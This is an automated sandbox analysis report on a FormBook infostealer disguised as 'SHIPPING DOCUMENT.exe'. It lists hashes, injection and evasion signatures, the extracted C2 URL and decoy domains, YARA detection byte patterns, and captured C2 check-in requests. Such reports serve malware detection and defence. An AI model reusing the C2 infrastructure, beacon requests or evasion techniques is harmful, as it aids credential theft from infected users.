Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Analysis Report SHIPPING DOCUMENT.exe

Overview

General Information

Sample Name:SHIPPING DOCUMENT.exe
Analysis ID:404217
MD5:25e847b9631bc2fe8d87fe4278fa142e
SHA1:641756a84fdce68e101a53cfa6809b68190b7ad7
SHA256:70dfd7bc81878d265e39803f73f55af96d7bf2a336408b52cc6005785fbe0415
Tags:exe
Infos:

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
C2 URLs / IPs found in malware configuration
Executable has a suspicious name (potential lure to open the executable)
Initial sample is a PE file and has a suspicious name
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Uses netstat to query active network connections and open ports
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • SHIPPING DOCUMENT.exe (PID: 7060 cmdline: 'C:\Users\user\Desktop\SHIPPING DOCUMENT.exe' MD5: 25E847B9631BC2FE8D87FE4278FA142E)
    • SHIPPING DOCUMENT.exe (PID: 7088 cmdline: 'C:\Users\user\Desktop\SHIPPING DOCUMENT.exe' MD5: 25E847B9631BC2FE8D87FE4278FA142E)
      • explorer.exe (PID: 3424 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • autofmt.exe (PID: 5756 cmdline: C:\Windows\SysWOW64\autofmt.exe MD5: 7FC345F685C2A58283872D851316ACC4)
        • NETSTAT.EXE (PID: 5752 cmdline: C:\Windows\SysWOW64\NETSTAT.EXE MD5: 4E20FF629119A809BC0E7EE2D18A7FDB)
          • cmd.exe (PID: 6948 cmdline: /c del 'C:\Users\user\Desktop\SHIPPING DOCUMENT.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 6664 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.knighttechinca.com/dxe/"], "decoy": ["sardarfarm.com", "959tremont.com", "privat-livecam.net", "ansel-homebakery.com", "joysupermarket.com", "peninsulamatchmakers.net", "northsytyle.com", "radioconexaoubermusic.com", "relocatingrealtor.com", "desyrnan.com", "onlinehoortoestel.online", "enpointe.online", "rvvikings.com", "paulpoirier.com", "shitarpa.net", "kerneis.net", "rokitreach.com", "essentiallygaia.com", "prestiged.net", "fuerzaagavera.com", "soukid.com", "moderndatingcoach.com", "mentalfreedom.guru", "bullishsoftware.com", "sectorulb.com", "outletyana.com", "fptplaybox.website", "artinmemory.com", "buyruon.com", "ljd.xyz", "mondaysmatters.com", "spiritsoundart.net", "ixiangzu.com", "lacompagniadelfardello.com", "bnctly.com", "sarasvati-yoga.com", "0055game.com", "lagrangewildliferemoval.com", "umlausa.com", "chaytel.com", "kkkc5.com", "union-green.com", "philreid4cc.com", "theanimehat.com", "redlightlegal.com", "myaustraliarewards.com", "barkinlot.com", "mujahidservice.online", "nugeneraonline.com", "sopplugin.com", "makemyroom.design", "ferienschweden.com", "fps2020dkasphotoop.com", "stylezbykay.com", "royalpropertiesgurugram.com", "birzulova.com", "cosmicmtn.com", "kissanime.press", "poweringprogress.today", "omsamedic.com", "drunkpoetsociety.com", "hostbison.com", "asapdecor.com", "houseofsisson.com"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000000.00000002.661322620.00000000023D0000.00000004.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000000.00000002.661322620.00000000023D0000.00000004.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000000.00000002.661322620.00000000023D0000.00000004.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x18409:$sqlite3step: 68 34 1C 7B E1
    • 0x1851c:$sqlite3step: 68 34 1C 7B E1
    • 0x18438:$sqlite3text: 68 38 2A 90 C5
    • 0x1855d:$sqlite3text: 68 38 2A 90 C5
    • 0x1844b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x18573:$sqlite3blob: 68 53 D8 7F 8C
    00000001.00000002.700344342.0000000000710000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000001.00000002.700344342.0000000000710000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 19 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      1.2.SHIPPING DOCUMENT.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        1.2.SHIPPING DOCUMENT.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        1.2.SHIPPING DOCUMENT.exe.400000.0.raw.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x18409:$sqlite3step: 68 34 1C 7B E1
        • 0x1851c:$sqlite3step: 68 34 1C 7B E1
        • 0x18438:$sqlite3text: 68 38 2A 90 C5
        • 0x1855d:$sqlite3text: 68 38 2A 90 C5
        • 0x1844b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x18573:$sqlite3blob: 68 53 D8 7F 8C
        1.1.SHIPPING DOCUMENT.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          1.1.SHIPPING DOCUMENT.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x8ae8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x8d62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x14885:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x14371:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x14987:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x14aff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x977a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x135ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xa473:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x1a527:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1b52a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 13 entries

          Sigma Overview

          No Sigma rule has matched

          Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Found malware configurationShow sources
          Source: 00000000.00000002.661322620.00000000023D0000.00000004.00000001.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.knighttechinca.com/dxe/"], "decoy": ["sardarfarm.com", "959tremont.com", "privat-livecam.net", "ansel-homebakery.com", "joysupermarket.com", "peninsulamatchmakers.net", "northsytyle.com", "radioconexaoubermusic.com", "relocatingrealtor.com", "desyrnan.com", "onlinehoortoestel.online", "enpointe.online", "rvvikings.com", "paulpoirier.com", "shitarpa.net", "kerneis.net", "rokitreach.com", "essentiallygaia.com", "prestiged.net", "fuerzaagavera.com", "soukid.com", "moderndatingcoach.com", "mentalfreedom.guru", "bullishsoftware.com", "sectorulb.com", "outletyana.com", "fptplaybox.website", "artinmemory.com", "buyruon.com", "ljd.xyz", "mondaysmatters.com", "spiritsoundart.net", "ixiangzu.com", "lacompagniadelfardello.com", "bnctly.com", "sarasvati-yoga.com", "0055game.com", "lagrangewildliferemoval.com", "umlausa.com", "chaytel.com", "kkkc5.com", "union-green.com", "philreid4cc.com", "theanimehat.com", "redlightlegal.com", "myaustraliarewards.com", "barkinlot.com", "mujahidservice.online", "nugeneraonline.com", "sopplugin.com", "makemyroom.design", "ferienschweden.com", "fps2020dkasphotoop.com", "stylezbykay.com", "royalpropertiesgurugram.com", "birzulova.com", "cosmicmtn.com", "kissanime.press", "poweringprogress.today", "omsamedic.com", "drunkpoetsociety.com", "hostbison.com", "asapdecor.com", "houseofsisson.com"]}
          Multi AV Scanner detection for dropped fileShow sources
          Source: C:\Users\user\AppData\Local\Temp\nszA951.tmp\2x6gdfzk.dllReversingLabs: Detection: 17%
          Multi AV Scanner detection for submitted fileShow sources
          Source: SHIPPING DOCUMENT.exeVirustotal: Detection: 34%Perma Link
          Source: SHIPPING DOCUMENT.exeReversingLabs: Detection: 44%
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000000.00000002.661322620.00000000023D0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.700344342.0000000000710000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.915966424.0000000003210000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.700119931.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.915737678.0000000002DC0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.915997507.0000000003240000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000001.656834932.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.700254188.00000000005A0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 1.2.SHIPPING DOCUMENT.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.SHIPPING DOCUMENT.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.SHIPPING DOCUMENT.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.SHIPPING DOCUMENT.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.SHIPPING DOCUMENT.exe.23d0000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.SHIPPING DOCUMENT.exe.23d0000.3.raw.unpack, type: UNPACKEDPE
          Machine Learning detection for sampleShow sources
          Source: SHIPPING DOCUMENT.exeJoe Sandbox ML: detected
          Source: 1.1.SHIPPING DOCUMENT.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 1.2.SHIPPING DOCUMENT.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 0.2.SHIPPING DOCUMENT.exe.23d0000.3.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: SHIPPING DOCUMENT.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
          Source: SHIPPING DOCUMENT.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: netstat.pdbGCTL source: SHIPPING DOCUMENT.exe, 00000001.00000002.700415930.000000000080A000.00000004.00000020.sdmp
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000004.00000002.926748711.0000000005A00000.00000002.00000001.sdmp
          Source: Binary string: netstat.pdb source: SHIPPING DOCUMENT.exe, 00000001.00000002.700415930.000000000080A000.00000004.00000020.sdmp
          Source: Binary string: wntdll.pdbUGP source: SHIPPING DOCUMENT.exe, 00000000.00000003.656956738.0000000003270000.00000004.00000001.sdmp, SHIPPING DOCUMENT.exe, 00000001.00000002.700435688.0000000000AA0000.00000040.00000001.sdmp, NETSTAT.EXE, 00000008.00000002.916653689.00000000039BF000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: SHIPPING DOCUMENT.exe, NETSTAT.EXE
          Source: Binary string: wscui.pdb source: explorer.exe, 00000004.00000002.926748711.0000000005A00000.00000002.00000001.sdmp
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 0_2_004059F0 CloseHandle,GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 0_2_0040659C FindFirstFileA,FindClose,
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 0_2_004027A1 FindFirstFileA,

          Networking:

          barindex
          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49766 -> 154.220.41.208:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49766 -> 154.220.41.208:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49766 -> 154.220.41.208:80
          C2 URLs / IPs found in malware configurationShow sources
          Source: Malware configuration extractorURLs: www.knighttechinca.com/dxe/
          Uses netstat to query active network connections and open portsShow sources
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\NETSTAT.EXE C:\Windows\SysWOW64\NETSTAT.EXE
          Source: global trafficHTTP traffic detected: GET /dxe/?k0GxOl=WjDhBMZGXEFchLZ7o6W3JT2VhJsjwIpQ+RcXbs0zm7DaFFVtu5gSyYsWe3hhttt0VKfM&NX1TzP=t8UH-PXh7J HTTP/1.1Host: www.barkinlot.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /dxe/?k0GxOl=sFVJxLIQKAVd+Y7XtG7gnaG34PPCpjG6GFyGl+6CuFNb0W3+mUMXX+9XGZNJldEnuWZ9&NX1TzP=t8UH-PXh7J HTTP/1.1Host: www.buyruon.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /dxe/?k0GxOl=RbAtrmEWvlHFDlwUmkIgxTv6ob9YXkoV/NFTjoChCyM+ucvF9ABfViB5xXwNeUqJEtMU&NX1TzP=t8UH-PXh7J HTTP/1.1Host: www.fuerzaagavera.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /dxe/?k0GxOl=sOnMPkACxZJCHwFpI01WJHJoP6Rqh5hpLBOGFt1I8eGpOjOkLkuqJ1zaMIEMMNEsyDxC&NX1TzP=t8UH-PXh7J HTTP/1.1Host: www.union-green.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 64.190.62.111 64.190.62.111
          Source: Joe Sandbox ViewASN Name: POWERLINE-AS-APPOWERLINEDATACENTERHK POWERLINE-AS-APPOWERLINEDATACENTERHK
          Source: global trafficHTTP traffic detected: GET /dxe/?k0GxOl=WjDhBMZGXEFchLZ7o6W3JT2VhJsjwIpQ+RcXbs0zm7DaFFVtu5gSyYsWe3hhttt0VKfM&NX1TzP=t8UH-PXh7J HTTP/1.1Host: www.barkinlot.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /dxe/?k0GxOl=sFVJxLIQKAVd+Y7XtG7gnaG34PPCpjG6GFyGl+6CuFNb0W3+mUMXX+9XGZNJldEnuWZ9&NX1TzP=t8UH-PXh7J HTTP/1.1Host: www.buyruon.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /dxe/?k0GxOl=RbAtrmEWvlHFDlwUmkIgxTv6ob9YXkoV/NFTjoChCyM+ucvF9ABfViB5xXwNeUqJEtMU&NX1TzP=t8UH-PXh7J HTTP/1.1Host: www.fuerzaagavera.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /dxe/?k0GxOl=sOnMPkACxZJCHwFpI01WJHJoP6Rqh5hpLBOGFt1I8eGpOjOkLkuqJ1zaMIEMMNEsyDxC&NX1TzP=t8UH-PXh7J HTTP/1.1Host: www.union-green.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: unknownDNS traffic detected: queries for: www.barkinlot.com
          Source: explorer.exe, 00000004.00000000.682293181.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
          Source: SHIPPING DOCUMENT.exeString found in binary or memory: http://nsis.sf.net/NSIS_Error
          Source: SHIPPING DOCUMENT.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
          Source: explorer.exe, 00000004.00000002.917278405.0000000002B50000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
          Source: explorer.exe, 00000004.00000000.682293181.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: explorer.exe, 00000004.00000000.682293181.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
          Source: explorer.exe, 00000004.00000000.682293181.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
          Source: explorer.exe, 00000004.00000000.682293181.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
          Source: explorer.exe, 00000004.00000000.682293181.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
          Source: explorer.exe, 00000004.00000000.682293181.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: explorer.exe, 00000004.00000000.682293181.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
          Source: explorer.exe, 00000004.00000000.682293181.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
          Source: explorer.exe, 00000004.00000000.682293181.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
          Source: explorer.exe, 00000004.00000000.682293181.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
          Source: explorer.exe, 00000004.00000000.682293181.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
          Source: explorer.exe, 00000004.00000000.682293181.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
          Source: explorer.exe, 00000004.00000000.682293181.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: explorer.exe, 00000004.00000000.682293181.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: explorer.exe, 00000004.00000000.682293181.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: explorer.exe, 00000004.00000000.682293181.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: explorer.exe, 00000004.00000000.682293181.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
          Source: explorer.exe, 00000004.00000000.682293181.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: explorer.exe, 00000004.00000000.682293181.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: explorer.exe, 00000004.00000000.682293181.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
          Source: explorer.exe, 00000004.00000000.682293181.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: explorer.exe, 00000004.00000000.682293181.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
          Source: explorer.exe, 00000004.00000000.682293181.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
          Source: explorer.exe, 00000004.00000000.682293181.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: NETSTAT.EXE, 00000008.00000002.917087722.00000000042BF000.00000004.00000001.sdmpString found in binary or memory: http://www.yabovip1288.com
          Source: explorer.exe, 00000004.00000000.682293181.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
          Source: NETSTAT.EXE, 00000008.00000002.917087722.00000000042BF000.00000004.00000001.sdmpString found in binary or memory: https://hm.baidu.com/hm.js?2f7ed51008e649f38c9a7a932b01f7d5
          Source: NETSTAT.EXE, 00000008.00000002.917087722.00000000042BF000.00000004.00000001.sdmpString found in binary or memory: https://sedo.com/search/details/?partnerid=324561&language=it&domain=fuerzaagavera.com&origin=sales_
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 0_2_0040548D GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000000.00000002.661322620.00000000023D0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.700344342.0000000000710000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.915966424.0000000003210000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.700119931.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.915737678.0000000002DC0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.915997507.0000000003240000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000001.656834932.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.700254188.00000000005A0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 1.2.SHIPPING DOCUMENT.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.SHIPPING DOCUMENT.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.SHIPPING DOCUMENT.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.SHIPPING DOCUMENT.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.SHIPPING DOCUMENT.exe.23d0000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.SHIPPING DOCUMENT.exe.23d0000.3.raw.unpack, type: UNPACKEDPE

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 00000000.00000002.661322620.00000000023D0000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.661322620.00000000023D0000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.700344342.0000000000710000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.700344342.0000000000710000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000008.00000002.915966424.0000000003210000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000008.00000002.915966424.0000000003210000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.700119931.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.700119931.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000008.00000002.915737678.0000000002DC0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000008.00000002.915737678.0000000002DC0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000008.00000002.915997507.0000000003240000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000008.00000002.915997507.0000000003240000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000001.656834932.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000001.656834932.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.700254188.00000000005A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.700254188.00000000005A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.SHIPPING DOCUMENT.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.SHIPPING DOCUMENT.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
